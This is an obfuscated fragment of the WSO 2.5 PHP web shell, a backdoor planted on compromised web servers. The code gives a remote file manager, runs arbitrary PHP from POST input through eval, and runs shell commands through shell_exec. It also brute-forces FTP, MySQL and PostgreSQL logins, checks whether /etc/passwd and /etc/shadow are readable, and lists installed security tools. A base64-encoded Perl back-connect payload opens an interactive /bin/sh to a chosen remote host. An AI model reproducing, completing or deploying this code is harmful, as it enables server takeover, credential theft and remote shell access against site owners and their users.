" . $_SERVER["HTTP_HOST"] . " - WSO " . WSO

	Name	Size	Modify	Owner/Group	Permissions	Actions
\xd\xa \xd\xa\x9 \xa \xd\xa "; } goto T3WX2; DufhY: if ($dirContent === false) { goto KJVLY; PFKsl: wsoFooter(); goto ZsRi7; KJVLY: echo "Can't open this folder!"; goto PFKsl; ZsRi7: return; goto Uwcm2; Uwcm2: } goto S7vm3; T3WX2: echo "
"; goto LggyK; jReNS: if (empty($_POST["p2"])) { $_POST["p2"] = "view"; } goto URhzm; OeBNf: echo "

"; goto kfx86; vLiGd: echo "Create time: " . date("Y-m-d H:i:s", filectime($_POST["p1"])) . " Access time: " . date("Y-m-d H:i:s", fileatime($_POST["p1"])) . " Modify time: " . date("Y-m-d H:i:s", filemtime($_POST["p1"])) . "

"; goto jReNS; LggyK: if (!file_exists(@$_POST["p1"])) { goto uyJNU; C_fb1: return; goto fRIHs; uyJNU: echo "File not exists"; goto aEu8k; aEu8k: wsoFooter(); goto C_fb1; fRIHs: } goto RVSqZ; BkWtk: if (isset($_POST["p1"])) { $_POST["p1"] = urldecode($_POST["p1"]); } goto nB0r7; UpcWr: wsoHeader(); goto hJxBN; q1Rl0: wsoFooter(); goto lZIie; RVSqZ: $uid = @posix_getpwuid(@fileowner($_POST["p1"])); goto FcH_v; kfx86: switch ($_POST["p2"]) { case "view": goto QAifq; bn9Hw: if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } goto bbBoN; bbBoN: echo ""; goto K9Wsy; GqRN7: $fp = @fopen($_POST["p1"], "r"); goto bn9Hw; K9Wsy: break; goto xBp1j; QAifq: echo "
"; goto GqRN7; xBp1j: case "highlight": if (@is_readable($_POST["p1"])) { goto QC8Iq; XU2TQ: $code = @highlight_file($_POST["p1"], true); goto MtAXT; QC8Iq: echo ""; goto XU2TQ; MtAXT: echo str_replace(array(""), array(""), $code) . "
"; goto nntLP; nntLP: } break; case "chmod": goto P8hG1; LoNwV: break; goto AyuC5; lmil1: echo "
"; goto LoNwV; AAUh2: clearstatcache(); goto lmil1; P8hG1: if (!empty($_POST["p3"])) { goto dVl9Y; brcvZ: for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["p3"][$i] * pow(8, strlen($_POST["p3"]) - $i - 1); } goto NKCFJ; NKCFJ: if (!@chmod($_POST["p1"], $perms)) { echo "Can't set permissions!
"; } goto PY3E2; dVl9Y: $perms = 0; goto brcvZ; PY3E2: } goto AAUh2; AyuC5: case "edit": goto H2fMN; jCDwf: echo ""; goto Pjp_6; l2f3k: echo ""; goto B2Klk; YessQ: if (!empty($_POST["p3"])) { goto rcwpk; JCP0G: $fp = @fopen($_POST["p1"], "w"); goto UIGX9; UIGX9: if ($fp) { goto AyUGu; ZpECv: echo "Saved!<br><script>p3_="";</script>"; goto ukKwu; zJt34: @fclose($fp); goto ZpECv; AyUGu: @fwrite($fp, $_POST["p3"]); goto zJt34; ukKwu: @touch($_POST["p1"], $time, $time); goto w_o1Q; w_o1Q: } goto ccEmf; yLb3a: $_POST["p3"] = substr($_POST["p3"], 1); goto JCP0G; rcwpk: $time = @filemtime($_POST["p1"]); goto yLb3a; ccEmf: } goto l2f3k; H2fMN: if (!is_writable($_POST["p1"])) { echo "File isn't writeable"; break; } goto YessQ; B2Klk: $fp = @fopen($_POST["p1"], "r"); goto of9BR; of9BR: if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } goto jCDwf; Pjp_6: break; goto Gznea; Gznea: case "hexdump": goto m3kPv; AuUGX: $h = array("00000000<br>", '', ''); goto GyLAr; qeOJi: $n = 0; goto AuUGX; jL3k2: echo "<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>" . $h[0] . "</pre></span></td><td bgcolor=#282828><pre>" . $h[1] . "</pre></td><td bgcolor=#333333><pre>" . htmlspecialchars($h[2]) . "</pre></td></tr></table>"; goto Ufiap; m3kPv: $c = @file_get_contents($_POST["p1"]); goto qeOJi; Lem2Z: for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " "; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { goto NPU7A; NPU7A: $n = 0; goto LQkUO; fObRZ: $h[1] .= "<br>"; goto fMXko; LQkUO: if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "<br>"; } goto fObRZ; fMXko: $h[2] .= "
"; goto BJu_G; BJu_G: } } goto jL3k2; GyLAr: $len = strlen($c); goto Lem2Z; Ufiap: break; goto owLSP; owLSP: case "rename": goto DPp_y; zaQju: break; goto Mf7Ir; DPp_y: if (!empty($_POST["p3"])) { if (!@rename($_POST["p1"], $_POST["p3"])) { echo "Can't rename!<br>"; } else { die("<script>g(null,null,"" . urlencode($_POST["p3"]) . "",null,"")</script>"); } } goto S0xqX; S0xqX: echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.name.value);return false;"><input type=text name=name value="" . htmlspecialchars($_POST["p1"]) . ""><input type=submit value=">>"></form>"; goto zaQju; Mf7Ir: case "touch": goto MdNj9; fcpc8: echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.touch.value);return false;"><input type=text name=touch value="" . date("Y-m-d H:i:s", @filemtime($_POST["p1"])) . ""><input type=submit value=">>"></form>"; goto vSHOq; vSHOq: break; goto RapuR; GWQpw: clearstatcache(); goto fcpc8; MdNj9: if (!empty($_POST["p3"])) { $time = strtotime($_POST["p3"]); if ($time) { if (!touch($_POST["p1"], $time, $time)) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } goto GWQpw; RapuR: } goto gIv2Z; nB0r7: if (@$_POST["p2"] == "download") { if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) { goto kEAXk; LrqUY: $fp = @fopen($_POST["p1"], "r"); goto oCCHm; rpfQA: if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST["p1"]); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } goto LrqUY; oCCHm: if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } goto Vqm3n; PiFXF: header("Content-Disposition: attachment; filename=" . basename($_POST["p1"])); goto rpfQA; kEAXk: ob_start("ob_gzhandler", 4096); goto PiFXF; Vqm3n: } exit; } goto tJhrh; XQqyZ: echo "<span>Name:</span> " . htmlspecialchars(@basename($_POST["p1"])) . " <span>Size:</span> " . (is_file($_POST["p1"]) ? wsoViewSize(filesize($_POST["p1"])) : "-") . " <span>Permission:</span> " . wsoPermsColor($_POST["p1"]) . " <span>Owner/Group:</span> " . $uid["name"] . "/" . $gid["name"] . "<br>"; goto vLiGd; lZIie: } goto w2GF1; etiAC: function wsoPerms($p) { goto kfyb8; GUcgT: $i .= $p & 0x1 ? $p & 0x200 ? "t" : "x" : ($p & 0x200 ? "T" : "-"); goto mshmE; kfyb8: if (($p & 0xc000) == 0xc000) { $i = "s"; } elseif (($p & 0xa000) == 0xa000) { $i = "l"; } elseif (($p & 0x8000) == 0x8000) { $i = "-"; } elseif (($p & 0x6000) == 0x6000) { $i = "b"; } elseif (($p & 0x4000) == 0x4000) { $i = "d"; } elseif (($p & 0x2000) == 0x2000) { $i = "c"; } elseif (($p & 0x1000) == 0x1000) { $i = "p"; } else { $i = "u"; } goto pqnZD; GuUyD: $i .= $p & 0x2 ? "w" : "-"; goto GUcgT; Vg6sO: $i .= $p & 0x10 ? "w" : "-"; goto vneDY; I8J2d: $i .= $p & 0x40 ? $p & 0x800 ? "s" : "x" : ($p & 0x800 ? "S" : "-"); goto yfJn7; pqnZD: $i .= $p & 0x100 ? "r" : "-"; goto FjLaa; yfJn7: $i .= $p & 0x20 ? "r" : "-"; goto Vg6sO; FjLaa: $i .= $p & 0x80 ? "w" : "-"; goto I8J2d; vneDY: $i .= $p & 0x8 ? $p & 0x400 ? "s" : "x" : ($p & 0x400 ? "S" : "-"); goto e6Pjl; e6Pjl: $i .= $p & 0x4 ? "r" : "-"; goto GuUyD; mshmE: return $i; goto MofP7; MofP7: } goto eRZM6; j4eIF: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = (bool) $default_use_ajax; } goto EoPoZ; qZOco: if (isset($_POST["c"])) { @chdir($_POST["c"]); } goto sO9OV; tZUOM: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = "win"; } else { $os = "nix"; } goto LqaMO; B8b3D: function actionRC() { if (!@$_POST["p1"]) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WSO_VERSION, "safemode" => @ini_get("safe_mode")); echo serialize($a); } else { eval($_POST["p1"]); } } goto dPSqc; Gop14: $disable_functions = @ini_get("disable_functions"); goto oE6Ue; oHsYW: function actionPhp() { goto s1VTJ; ujMFQ: wsoFooter(); goto dfcYP; s1VTJ: if (isset($_POST["ajax"])) { goto jtGxB; XiIjv: eval($_POST["p1"]); goto pcNS1; cL7XN: ob_start(); goto XiIjv; keRr1: exit; goto cNits; t7wh1: echo strlen($temp), "
", $temp; goto keRr1; pcNS1: $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\xa
	\'\x0") . "';\xa"; goto t7wh1; jtGxB: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto cL7XN; cNits: } goto IyHRn; wcs04: echo "</pre></div>"; goto ujMFQ; Sz7n2: echo "<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a('Php',null,this.code.value);}else{g('Php',null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>" . (!empty($_POST["p1"]) ? htmlspecialchars($_POST["p1"]) : '') . ""; goto bE4Om; t2vRD: wsoHeader(); goto om2si; oWPfu: if (!empty($_POST["p1"])) { goto uFjl_; uFjl_: ob_start(); goto XYFVS; qDLEK: echo htmlspecialchars(ob_get_clean()); goto Zre8T; XYFVS: eval($_POST["p1"]); goto qDLEK; Zre8T: } goto wcs04; IyHRn: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto t2vRD; om2si: if (isset($_POST["p2"]) && $_POST["p2"] == "info") { goto u6Vem; u6Vem: echo "PHP info
"; goto ClNOj; ClNOj: ob_start(); goto Z0UYj; WpKFt: $tmp = preg_replace(array("!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU", "!td, th {(.*)}!msiU", "!]+>!msiU"), array('', ".e, .v, .h, .h th {$1}", ''), $tmp); goto AiOL8; Z0UYj: phpinfo(); goto pDREm; pDREm: $tmp = ob_get_clean(); goto WpKFt; AiOL8: echo str_replace("
"; goto xiXKW; xiXKW: } goto Sz7n2; bE4Om: echo "  send using AJAX"; goto oWPfu; dfcYP: } goto N84uU; jB3VR: $default_charset = "Windows-1251"; goto fj9OS; rTVjF: function actionLogout() { setcookie(md5($_SERVER["HTTP_HOST"]), '', time() - 3600); die("bye!"); } goto i6mTz; DbGtY: function actionBruteforce() { goto uMF9i; hSv50: if (isset($_POST["proto"])) { goto jX4Q5; UnBlf: if ($_POST["type"] == 1) { $temp = @file("/etc/passwd"); if (is_array($temp)) { foreach ($temp as $line) { goto vXxXO; zFefs: if (@$_POST["reverse"]) { goto S2jvF; oahSQ: for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } goto rxcry; S2jvF: $tmp = ''; goto oahSQ; rxcry: ++$attempts; goto TfDj5; TfDj5: if (wsoBruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "" . htmlspecialchars($line[0]) . ":" . htmlspecialchars($tmp); } goto lNTnA; lNTnA: } goto i039d; b2CQw: ++$attempts; goto i1_FI; i1_FI: if (wsoBruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "" . htmlspecialchars($line[0]) . ":" . htmlspecialchars($line[0]) . "
"; } goto zFefs; vXxXO: $line = explode(":", $line); goto b2CQw; i039d: } } } elseif ($_POST["type"] == 2) { $temp = @file($_POST["dict"]); if (is_array($temp)) { foreach ($temp as $line) { goto kf0wF; NI_R6: if (wsoBruteForce($server[0], @$server[1], $_POST["login"], $line)) { $success++; echo "" . htmlspecialchars($_POST["login"]) . ":" . htmlspecialchars($line) . "
"; } goto JCePy; kf0wF: $line = trim($line); goto byC2k; byC2k: ++$attempts; goto NI_R6; JCePy: } } } goto VERJt; jX4Q5: echo "Results
Type: " . htmlspecialchars($_POST["proto"]) . " Server: " . htmlspecialchars($_POST["server"]) . "
"; goto LBJl4; VERJt: echo "Attempts: {$attempts} Success: {$success}

"; goto U2KZG; ObcWW: $server = explode(":", $_POST["server"]); goto UnBlf; LBJl4: if ($_POST["proto"] == "ftp") { function wsoBruteForce($ip, $port, $login, $pass) { goto w1bnC; MJhTf: @ftp_close($fp); goto efLYK; efLYK: return $res; goto zU7bZ; aqJAG: $res = @ftp_login($fp, $login, $pass); goto MJhTf; w1bnC: $fp = @ftp_connect($ip, $port ? $port : 21); goto NYGOQ; NYGOQ: if (!$fp) { return false; } goto aqJAG; zU7bZ: } } elseif ($_POST["proto"] == "mysql") { function wsoBruteForce($ip, $port, $login, $pass) { goto nwkI1; tqKjk: @mysqli_close($res); goto lNvU5; nwkI1: $res = @mysqli_connect($ip . ":" . $port ? $port : 3306, $login, $pass); goto tqKjk; lNvU5: return $res; goto h_hcl; h_hcl: } } elseif ($_POST["proto"] == "pgsql") { function wsoBruteForce($ip, $port, $login, $pass) { goto ucMyA; DgnPW: @pg_close($res); goto qQMP_; qQMP_: return $res; goto N73qn; ucMyA: $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; goto szIUy; szIUy: $res = @pg_connect($str); goto DgnPW; N73qn: } } goto px18Z; px18Z: $success = 0; goto aKdd5; aKdd5: $attempts = 0; goto ObcWW; U2KZG: } goto NNTq8; NNTq8: echo "Bruteforce
" . "" . "" . "" . "" . "" . "" . "
Type 
" . "" . "" . "" . "Server:port 
Brute type  /etc/passwd
 reverse (login -> nigol)
 Dictionary
" . "" . "" . "Login 
Dictionary 
" . "
"; goto HIh7o; uMF9i: wsoHeader(); goto hSv50; HIh7o: echo "

"; goto wlwoF; wlwoF: wsoFooter(); goto p3uSI; p3uSI: } goto wVO2a; uf2tU: $default_use_ajax = true; goto jB3VR; d62j5: function wsoEx($in) { $out = shell_exec($in); return $out; } goto yXkOt; wVO2a: function actionSql() { goto pXyEP; WqMW0: if (@$_POST["type"] == "pgsql") { echo "selected"; } goto bZFnU; qgUXu: echo ""; goto G862b; G862b: wsoFooter(); goto gsteZ; bZFnU: echo ">PostgreSql
\xa\xd

\xa"; goto dxViD; dxViD: $tmp = ""; goto L_VIT; Auorx: echo "\xd\xa\x9	\x9	\xd\xa                 count the number of rows\xd\xa		\x9\xd\xa\x9	
	\x9"; goto omuNC; omuNC: if (isset($db) && $db->link) { goto wQooQ; v7m0f: if (!empty($_POST["sql_base"])) { goto Rgzyg; MvXdD: if (@$_POST["p1"] == "query" && !empty($_POST["p2"])) { $db->query(@$_POST["p2"]); if ($db->res !== false) { goto p5kAe; FQZVM: while ($item = $db->fetch()) { if (!$title) { goto UHBlV; UHBlV: echo ""; goto hcvnp; krRoK: $line = 2; goto OQDWZ; hcvnp: foreach ($item as $key => $value) { echo "" . $key . ""; } goto gYEfe; s133J: $title = true; goto vdCQU; vdCQU: echo ""; goto krRoK; gYEfe: reset($item); goto s133J; OQDWZ: } echo ""; $line = $line == 1 ? 2 : 1; foreach ($item as $key => $value) { if ($value == null) { echo "null"; } else { echo "" . nl2br(htmlspecialchars($value)) . ""; } } echo ""; } goto LonsA; c36CC: $line = 1; goto FQZVM; LonsA: echo ""; goto zCgso; vhOW_: echo ""; goto c36CC; p5kAe: $title = false; goto vhOW_; zCgso: } else { echo "Error: " . htmlspecialchars($db->error()) . "
"; } } goto f63uD; f63uD: echo "
"; goto l03yb; Rgzyg: $db->selectdb($_POST["sql_base"]); goto QW0Ku; uEPKu: if (@$_POST["p1"] == "select") { goto mAhBO; IznKf: if ($_POST["p3"] > 1) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] - 1) . ")'>< Prev</a>"; } goto ZoHo3; l2Xna: $pages = ceil($num["n"] / 30); goto ZYT4s; mAhBO: $_POST["p1"] = "query"; goto e_ZJ4; ZYT4s: echo "<script>d.sf.onsubmit=function(){st("" . $_POST["p2"] . "", d.sf.p3.value)}</script><span>" . $_POST["p2"] . "</span> ({$num["n"]} records) Page # <input type=text name='p3' value=" . (int) $_POST["p3"] . ">"; goto uoZpe; Es7M3: $num = $db->fetch(); goto l2Xna; uoZpe: echo " of {$pages}"; goto IznKf; rczWG: $_POST["p3"]--; goto bhg9h; e_ZJ4: $_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1; goto Lo_J9; nEjUO: echo "<br><br>"; goto IQ9di; bhg9h: if ($_POST["type"] == "pgsql") { $_POST["p2"] = "SELECT * FROM " . $_POST["p2"] . " LIMIT 30 OFFSET " . $_POST["p3"] * 30; } else { $_POST["p2"] = "SELECT * FROM `" . $_POST["p2"] . "` LIMIT " . $_POST["p3"] * 30 . ",30"; } goto nEjUO; Lo_J9: $db->query("SELECT COUNT(*) as n FROM " . $_POST["p2"]); goto Es7M3; ZoHo3: if ($_POST["p3"] < $pages) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] + 1) . ")'>Next ></a>"; } goto rczWG; IQ9di: } goto MvXdD; EHE8j: echo "
"; goto epF3V; bDaxO: while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM " . $value . '')); } $value = htmlspecialchars($value); echo " " . $value . "" . (empty($_POST["sql_count"]) ? " " : " ({$n["n"]})") . "
"; } goto M5p5r; l03yb: if (!empty($_POST["p2"]) && $_POST["p1"] != "loadfile") { echo htmlspecialchars($_POST["p2"]); } goto EHE8j; M5p5r: echo "
File path:"; goto DdhHe; ss2k2: $tbls_res = $db->listTables(); goto bDaxO; DdhHe: } goto E6Jlf; E6Jlf: echo "
 "; goto uEPKu; QW0Ku: echo "
Tables:

"; goto ss2k2; epF3V: echo "

"; goto eqSj_; HfqGV: if (@$_POST["p1"] == "loadfile") { $file = $db->loadFile($_POST["p2"]); echo "
" . htmlspecialchars($file["file"]) . "
"; } goto OSIXi; eqSj_: if ($_POST["type"] == "mysql") { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "Load file 
"; } } goto HfqGV; wQooQ: echo "
"; goto v7m0f; OSIXi: } else { echo htmlspecialchars($db->error()); } goto qgUXu; eZaK7: echo "\xd
Sql browser

\xd\xa\xd\xa"; } goto QoI2U; wJ6Eu: foreach ($charsets as $item) { $opt_charsets .= ""; } goto M4wyI; dJUUJ: if ($GLOBALS["os"] == "win") { foreach (range("c", "z") as $drive) { if (is_dir($drive . ":\")) { $drives .= "[ " . $drive . " ] "; } } } goto FKql5; wwJNm: global $color; goto nmRB7; gDdS4: $release = @php_uname("r"); goto znu8e; oXY47: if (!function_exists("posix_getegid")) { goto VMtJd; VMtJd: $user = @get_current_user(); goto RNehq; RNehq: $uid = @getmyuid(); goto kWs3Y; n3X6Y: $group = "?"; goto dyMHz; kWs3Y: $gid = @getmygid(); goto n3X6Y; dyMHz: } else { goto ec83q; yJq0B: $uid = $uid["uid"]; goto nZ1Iw; nZ1Iw: $group = $gid["name"]; goto LgEQ1; LgEQ1: $gid = $gid["gid"]; goto XEe3x; q9aTZ: $user = $uid["name"]; goto yJq0B; ERGtZ: $gid = @posix_getgrgid(posix_getegid()); goto q9aTZ; ec83q: $uid = @posix_getpwuid(posix_geteuid()); goto ERGtZ; XEe3x: } goto HU3s7; HU3s7: $cwd_links = ''; goto PbU2y; RzURU: } goto pXSrD; lUvYe: if (!function_exists("posix_getgrgid") && strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false) { function posix_getgrgid($p) { return false; } } goto d62j5; V8rDW: @set_time_limit(0); goto hd5Oa; KCE0z: function wsoWhich($p) { goto qE7x8; bvBsL: if (!empty($path)) { return $path; } goto A0ITv; qE7x8: $path = wsoEx("which " . $p); goto bvBsL; A0ITv: return false; goto xhdvj; xhdvj: } goto HhMRL; guAyk: function wsoScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { goto AwLVq; hfmSV: while (false !== ($filename = readdir($dh))) { $files[] = $filename; } goto Rc9At; Rc9At: return $files; goto dO6EV; AwLVq: $dh = opendir($dir); goto hfmSV; dO6EV: } } goto KCE0z; pXSrD: function wsoFooter() { $is_writable = is_writable($GLOBALS["cwd"]) ? " (Writeable)" : " (Not writable)"; echo "\xd\xa\xd

Type Host Login Password Database 
"; goto pJJmI; CgrPi: $db->listDbs(); goto KKbSG; MV0Hw: while ($item = $db->fetch()) { list($key, $value) = each($item); echo ""; } goto hq4SA; KKbSG: echo " \xd
\x9\xd\xa	\xd\xa\x9Back-connect  [perl]

	Server:  Port:  
\x9

"; goto y9LP4; JZOTa: echo ""; goto QtVUX; ui6gf: $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; goto unkZP; r_ZsG: } goto B8b3D; ABTpd: @ini_set("max_execution_time", 0); goto V8rDW; LNmAT: $default_action = "FilesMan"; goto uf2tU; hd5Oa: @define("WSO_VERSION", "2.5"); goto XWpnO; w2GF1: function actionConsole() { goto rclMD; fIAZm: if (isset($_POST["ajax"])) { goto b0kHG; UVP1d: exit; goto FfbZi; k7CDe: echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; goto X7NDa; nIuhp: if (preg_match("!.*cd\s+([^;]+)$!", $_POST["p1"], $match)) { if (@chdir($match[1])) { $GLOBALS["cwd"] = @getcwd(); echo "c_='" . $GLOBALS["cwd"] . "';"; } } goto VTnj_; LPhSs: $temp = @iconv($_POST["charset"], "UTF-8", addcslashes("\xa$ " . $_POST["p1"] . "\xa" . wsoEx($_POST["p1"]), "\xa\xd\x9\'\x0")); goto nIuhp; y6Hrb: echo "d.cf.cmd.value='';
"; goto LPhSs; wcz4k: ob_start(); goto y6Hrb; VTnj_: echo "d.cf.output.value+='" . $temp . "';"; goto k7CDe; jyokt: echo strlen($temp), "
", $temp; goto UVP1d; b0kHG: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto wcz4k; X7NDa: $temp = ob_get_clean(); goto jyokt; FfbZi: } goto KpSEA; RZ79V: echo ""; goto SJHUc; f8SjV: echo "  send using AJAX  redirect stderr to stdout (2>&1)
"; goto IWzV6; SJHUc: wsoFooter(); goto APwh_; nacH0: echo "$ 
"; goto RZ79V; qs3Ch: echo "Console
From 
To 
"; goto Fh4yv; Fh4yv: if (isset($_POST["p2"], $_POST["p3"]) && is_numeric($_POST["p2"]) && is_numeric($_POST["p3"])) { goto TMVUA; Aagop: wsoSecParam("Users", $temp); goto H4g4C; TMVUA: $temp = ''; goto g4wsK; yuLqo: echo "
"; goto Aagop; g4wsK: for (; $_POST["p2"] <= $_POST["p3"]; $_POST["p2"]++) { $uid = @posix_getpwuid($_POST["p2"]); if ($uid) { $temp .= join(":", $uid) . "
"; } } goto yuLqo; H4g4C: } goto GP22b; vzm5g: wsoSecParam("HDD space", wsoEx("df -h")); goto SphFn; j1mm2: $danger = array("kav", "nod32", "bdcored", "uvscan", "sav", "drwebd", "clamd", "rkhunter", "chkrootkit", "iptables", "ipfw", "tripwire", "shieldcc", "portsentry", "snort", "ossec", "lidsadm", "tcplodg", "sxid", "logcheck", "logwatch", "sysmask", "zmbscap", "sawmill", "wormscan", "ninja"); goto M0R0C; xDJbP: $temp = array(); goto pSd_M; pSd_M: foreach ($downloaders as $item) { if (wsoWhich($item)) { $temp[] = $item; } } goto AYbzB; nuthD: echo "
"; goto IArV4; GP22b: } goto QDcOt; yzksH: wsoSecParam("Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes [view]" : "no"); goto ledym; ESH98: wsoSecParam("OS version", @file_get_contents("/proc/version")); goto ZLZ7x; ZLZ7x: wsoSecParam("Distr name", @file_get_contents("/etc/issue.net")); goto Pr2du; ledym: wsoSecParam("Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes [view]" : "no"); goto ESH98; QDcOt: } else { goto NsBCo; Me9Q1: wsoSecParam("Account Settings", wsoEx("net accounts")); goto RXCoL; NsBCo: wsoSecParam("OS Version", wsoEx("ver")); goto Me9Q1; RXCoL: wsoSecParam("User Accounts", wsoEx("net user")); goto DnuxL; DnuxL: } goto IbU7m; wqp98: wsoHeader(); goto Kcf2h; aO8HS: if (function_exists("apache_get_modules")) { wsoSecParam("Loaded Apache modules", implode(", ", apache_get_modules())); } goto m3Zin; deosI: function wsoSecParam($n, $v) { $v = trim($v); if ($v) { echo "" . $n . ": "; if (strpos($v, "
") === false) { echo $v . "
"; } else { echo "" . $v . "
"; } } } goto zA3JJ; jAziO: } goto oHsYW; qljle: if ($cwd[strlen($cwd) - 1] != "/") { $cwd .= "/"; } goto j4eIF; g7ZCc: @ini_set("log_errors", 0); goto ABTpd; XeOpc: if (!function_exists("posix_getpwuid") && strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false) { function posix_getpwuid($p) { return false; } } goto lUvYe; KC9ar: function actionStringTools() { goto MBvsT; S0req: if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } goto nYBgB; Oymko: if (!function_exists("hex2ascii")) { function hex2ascii($p) { goto uM0Pu; NG1dD: return $r; goto fKGDN; uM0Pu: $r = ''; goto ac1Yo; ac1Yo: for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } goto NG1dD; fKGDN: } } goto ZMcUd; vUNKP: echo "  send using AJAX
" . (empty($_POST["p1"]) ? '' : htmlspecialchars(@$_POST["p2"])) . ""; goto k5nqW; ZMcUd: if (!function_exists("ascii2hex")) { function ascii2hex($p) { goto cdb2T; O0tgA: for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf("%02X", ord($p[$i])); } goto JVXpM; cdb2T: $r = ''; goto O0tgA; JVXpM: return strtoupper($r); goto I6jbu; I6jbu: } } goto q2kmv; HYxD9: echo "String conversions
"; goto OX44o; awjDW: function wsoRecursiveGlob($path) { goto TkAHe; lEFZ5: if (is_array($paths) && @count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { wsoRecursiveGlob($item); } } else { if (empty($_POST["p2"]) || @strpos(file_get_contents($item), $_POST["p2"]) !== false) { echo "" . htmlspecialchars($item) . "
"; } } } } goto fVCol; GUM3F: $paths = @array_unique(@array_merge(@glob($path . $_POST["p3"]), @glob($path . "*", GLOB_ONLYDIR))); goto lEFZ5; TkAHe: if (substr($path, -1) != "/") { $path .= "/"; } goto GUM3F; fVCol: } goto qLbIZ; aUced: if (!function_exists("binhex")) { function binhex($p) { return dechex(bindec($p)); } } goto Oymko; MBvsT: if (!function_exists("hex2bin")) { function hex2bin($p) { return decbin(hexdec($p)); } } goto aUced; q2kmv: if (!function_exists("full_urlencode")) { function full_urlencode($p) { goto d1_DN; d1_DN: $r = ''; goto D3iJl; YAXHC: return strtoupper($r); goto wfgBE; D3iJl: for ($i = 0; $i < strlen($p); ++$i) { $r .= "%" . dechex(ord($p[$i])); } goto YAXHC; wfgBE: } } goto IHtdM; N3xOi: if (isset($_POST["ajax"])) { goto V2x0a; Wm5Kx: exit; goto IafqZ; x5Jd7: if (in_array($_POST["p1"], $stringTools)) { echo $_POST["p1"]($_POST["p2"]); } goto vD3zd; vD3zd: $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\xd\x9\'\x0") . "';\xa"; goto NED_K; V2x0a: WSOsetcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); goto LTDt0; LTDt0: ob_start(); goto x5Jd7; NED_K: echo strlen($temp), "
